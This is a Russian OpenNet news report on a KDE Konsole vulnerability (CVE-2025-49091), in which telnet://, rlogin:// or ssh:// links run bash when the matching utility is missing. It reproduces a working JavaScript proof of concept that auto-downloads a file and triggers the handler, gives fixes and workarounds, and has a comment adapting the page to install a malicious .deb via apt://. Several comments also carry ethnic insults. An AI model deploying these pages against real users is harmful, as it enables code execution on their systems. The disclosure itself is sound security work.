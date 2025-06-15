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Уязвимость в KDE Konsole, позволяющая выполнить код при открытии страницы в браузере

15.06.2025 22:47

В развиваемом проектом KDE эмуляторе терминала Konsole выявлена уязвимость (CVE-2025-49091), позволяющая организовать выполнение кода в системе при открытии в браузере специально оформленной страницы.

Для Konsole по умолчанию в KDE регистрируется сервис KTelnetService (ktelnetservice6.desktop), подключающий обработчики открываемых в бразузере URL-схем telnet://, rlogin:// и ssh://. При обработке данных схем в эмуляторе терминала запускаются утилиты telnet, rlogin и ssh, которым передаётся указанный в ссылке путь.

Уязвимость вызвана тем, что в случае, когда в системе не установлена утилита telnet, rlogin или ssh, Konsole при вызове соответствующего обработчика URL запускал командный интерпретатор bash. Например, если отсутствует telnet при открытии в браузере ссылки "telnet:///proc/self/cwd/Downloads/evil" в Konsole запускался "/bin/bash /proc/self/cwd/Downloads/evil". По аналогии можно совершить атаку на обработчики rlogin:// и ssh:// при отсутствии в системе утилит rlogin и ssh.

Эксплуатации уязвимостей сопутствует то, что в конфигурации по умолчанию современные версии Firefox и Chrome автоматически сохраняют инициированные для загрузки файлы, не выводя запрос пользователю, а лишь показывая уведомление о факте состоявшейся загрузки. В Firefox подобное поведение можно отключить выставив настройку "Always ask you where to save files" на странице конфигуратора "General > Files and Applications". Как правило, файлы сохраняются в каталог ~/Downloads, на который не зная имени текущего пользователя можно сослаться через файловый путь "/proc/self/cwd/Downloads/".

Ниже показан пример JavaScript-кода, при выполнении которого в браузере в окружениях KDE с Konsole у пользователя будут выполнены команды "echo "Hello world"; touch /tmp/foobar" (в примере они закодированы в строке "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg=="). Предложенный код формирует ссылку с интегрированными данными, симулирует клик на эту ссылку и перебрасывает пользователя на URL "telnet://...". Для работы в Chrome следует изменить имя файла в ссылке на evil.txt, так как Chrome автоматически добавляет расширение txt. 


    <html>
    <head>
        <script type="text/javascript">

        function downloadAndRedirect() {
            const anchor = document.createElement('a');
            anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
            anchor.download = 'evil';
            document.body.appendChild(anchor);
            anchor.click();
            document.body.removeChild(anchor);

            setTimeout(() => {
                window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
            }, 1000);
        }
        </script>
    </head>
    <body onload="downloadAndRedirect()">
    </body>
    </html>

В Firefox и Chrome при попытке перехода по ссылке "telnet://" по умолчанию будет выведен запрос для подтверждения операции у пользователя. В случае согласия KTelnetService запустит команду: 


    /usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil

Если в системе нет утилиты telnet, Konsole откатится на запуск bash вместо telnet, передав изначально указанный в командной строке аргумент.

Проблема устранена в выпуске Konsole 25.04.2, вошедшем в состав обновления KDE Gear 25.04.2. Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD. В качестве обходных путей для блокирования уязвимости можно установить утилиты telnet, rlogin и ssh или удалить файл /usr/share/applications/ktelnetservice6.desktop.

  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: Уязвимости в GNOME Help и GIMP, позволяющие выполнить код при открытии файлов
  3. OpenNews: Уязвимости в утилите needrestart, позволяющие получить root-доступ в Ubuntu Server
  4. OpenNews: Уязвимость в KDE, позволяющая выполнить код при просмотре списка файлов
  5. OpenNews: Уязвимость в KDE Ark, позволяющая перезаписать файлы при открытии архива
  6. OpenNews: Уязвимость в store.kde.org и каталогах OpenDesktop
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63410-konsole
Ключевые слова: konsole, kde
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (32) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.2, Аноним (2), 23:19, 15/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +5 +/
    У меня больше вопрос в другом. Зачем это вообще в браузере? Кто и на... запускает telnet и ssh через браузер?
     
     
  • 2.4, Аноним (4), 23:37, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Ты лучше спроси зачем в браузере URL ghelp:// :-) https://opennet.ru/63035-gnome
    Хороши, что KDE, что GNOME, что дистрибутивы, регистрирующие кучу MIME-типов.

    PS. В Firefox в about:preferences#general  в поле поиска набери Applications, там полно всего, включая irc и apt. Как насчёт провернуть подобную атаку для установки левого пакета через apt?

     
     
  • 3.6, Аноним (4), 23:45, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Блин, а оно ведь сработало!

    В Ubuntu Firefox и Chrome загружают автоматом deb-пакет, а потом выводят запрос типа "Allow this site to open the apt link with AptURL?"

    Скрипт поправил так:

      function downloadAndRedirect() {
                const anchor = document.createElement('a');
                anchor.href = "data:;base64,содержимое deb-пакета в base64";
                anchor.download = 'evil.deb';
                document.body.appendChild(anchor);
                anchor.click();
                document.body.removeChild(anchor);
             
             setTimeout(() => {
             window.location.href = "apt:///proc/self/cwd/Downloads/evil.deb";
                 }, 1000);
            }


     
  • 3.10, 12yoexpert (ok), 23:52, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > Ты лучше спроси зачем в браузере URL ghelp://

    зачем тебе в браузере URL ghelp://?

     
  • 2.7, jj (?), 23:45, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Давным давно запускал, очень удобно когда у тебя счет железок на тысячи, или по вашему хранить ip надо в txt или exel.
     
  • 2.8, oficsu (ok), 23:47, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Это всё стандартные uri-хендлеры, которые могут открываться не только из браузера. Лучшее, что нармальный браузер может сделать (и делает, естественно) — это спросить, хочет ли пользователь запускать соответствующий хендлер. Будь это tel://, magnet:// или ssh:// — это дело пользователя, что он хочет открывать, а не браузера

    А ssh://, очевидно, является полезным обработчиком. Например, можно хотеть логиниться на сервер из менеджера паролей в один клик. И не важно, выступает ли этимм менеджером KeePassXC, какой-то вебапп на электроне или вообще корпоративная страничка в браузере с полным списком серверов и паролей. Пользователю нужно открыть ssh-доступ из приложения — он соглашется

     
     
  • 3.16, Аноним (16), 04:13, 16/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Да зачем вообще нужны программы, пусть уже всё браузер делает. Браузера хватит всем...
     
     
  • 4.34, Аноним (34), 05:30, 16/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Всё есть урл.
     

  • 1.3, 12yoexpert (ok), 23:32, 15/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    ну а что вы хотели от тимы, в которую вместо инженеров набрали эффективненьких самопиарщиков типа нэта грема
     
     
  • 2.17, Аноним (17), 04:26, 16/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    это не самопиар, а самообман - сообщество™ разработчиков кде по определению не может обеспечить качество на уровне корпоративного продукта

    единственная надежда у поклонников проекта кде заключается в том, что Габен и ко. возьмут кодовую базу этой СРС под свой контроль, то есть под контроль программистов на зарплате

    но зачем ждать, когда уже сейчас можно просто пользоваться GNOME? (:

     
     
  • 3.33, МИСАКА (?), 05:27, 16/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Сейчас бы пользоваться поделием, которое считает юзера за идиота и не может решить, хочет оно пародировать макось или иось
     

  • 1.5, oficsu (ok), 23:40, 15/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > в Konsole запускался "/bin/bash /proc/self/cwd/Downloads/evil"

    Который непременно должен откуда-то лежать у пользователя, быть баш-скриптом и непременно должен реализовывать желаемое злоумышленником поведение по умолчанию (без параметров, ибо их туда передать нельзя)?

     
     
  • 2.9, Аноним (4), 23:49, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    /proc/self/cwd/Downloads/evil ссылается на файл, который браузер автоматически без согласия пользователя может загрузить, в том и проблема, что по дефолту Firefox и Chrome без спроса грузят и во всплывающем уведомлении показывают, что загрузили.

    Раньше нужно было, чтобы пользователь хотя бы кликул на ссылку для начала загрузки, а сейчас из JavaScript достаточно вызвать метод click();

     
     
  • 3.11, oficsu (ok), 23:52, 15/06/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Спасибо, так действительно звучит намного опаснее
     
  • 3.12, Аноним (12), 00:17, 16/06/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Справедливости ради, при открытии такой ссылки браузер предупреждает пользователя. Проверил сейчас на хромом и лисе.
     

  • 1.13, Аноним (13), 00:29, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >В Firefox и Chrome при попытке перехода по ссылке "telnet://" по умолчанию будет выведен запрос для подтверждения операции у пользователя

    И где уязвимость?

     
     
  • 2.15, oficsu (ok), 03:17, 16/06/2025 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    В том месте, где браузером спрашивается подтверждение запуска telnet-обработчика, а Konsole вместо него запускает произвольный код
     

  • 1.14, Аноним (14), 00:31, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > удалить файл /usr/share/applications/ktelnetservice6.desktop

    Если у вас подкроватный сервер, который перезагружается раз в год, то не забудьте что-то вроде:

    $ sudo update-desktop-database

    чтобы перестроить кеш обработчиков MIME типов

     
  • 1.18, Аноним (18), 04:28, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Снова сишка. Во дела.
     
  • 1.19, Аноним (19), 04:47, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +/
     
  • 1.20, Аноним (19), 04:47, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Порвал мамашку московоротика.
     
  • 1.21, Аноним (19), 04:47, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +/
     
  • 1.22, Аноним (19), 04:48, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Украинские нацисты понад усе.
     
  • 1.23, Аноним (19), 04:48, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +1 +/
     
  • 1.24, Аноним (19), 04:49, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +1 +/
     
  • 1.25, Аноним (25), 04:51, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +/
     
  • 1.27, Аноним (25), 04:52, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Свидетельство о смерти - пасморт хорошего русака.
     
  • 1.28, Аноним (25), 04:53, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +/
     
  • 1.29, Аноним (25), 04:53, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
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  • 1.30, Аноним (30), 04:55, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
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  • 1.31, Аноним (30), 04:56, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
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  • 1.32, Аноним (30), 04:57, 16/06/2025 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
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